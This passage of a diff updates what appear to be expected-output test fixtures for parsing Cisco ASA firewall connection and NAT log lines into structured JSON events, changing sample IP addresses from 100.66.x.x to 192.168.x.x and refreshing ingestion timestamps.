"2021-12-09T13:33:41.995465Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9506,8 +9506,8 @@ }, "destination": { "port": 8285, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1281, @@ -9547,7 +9547,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9555,8 +9555,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165137200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285", + "ingested": "2021-12-09T13:33:41.995470400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9589,8 +9589,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9625,7 +9625,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9634,8 +9634,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165145200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", + "ingested": "2021-12-09T13:33:41.995475600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9651,7 +9651,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11807", "source_interface": "outside", "mapped_destination_port": 1281 @@ -9668,8 +9668,8 @@ }, "destination": { "port": 8286, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1282, @@ -9709,7 +9709,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9717,8 +9717,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165153200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286", + "ingested": "2021-12-09T13:33:41.995482100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9751,8 +9751,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165161100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:33:41.995486500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165169100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:33:41.995491300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165176900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:33:41.995495800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165185400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:33:41.995500500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165191900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:33:41.995505500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 +10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165198600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:33:41.995509700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165205200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:33:41.995515200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165210900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:33:41.995521400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165219Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:33:41.995526700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165227100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:33:41.995532Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165232400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:33:41.995537700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165237900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:33:41.995542900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165243600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:33:41.995548300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165251600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:33:41.995554700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165259900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:33:41.995561100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165267900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:33:41.995567600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165275700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:33:41.995573800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165280900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995580400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165287600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:33:41.995586500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165293400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:33:41.995592800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165301600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:33:41.995599Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165309900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995605200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165316600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:33:41.995610700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165324600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:33:41.995614500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165332600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:33:41.995619400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + 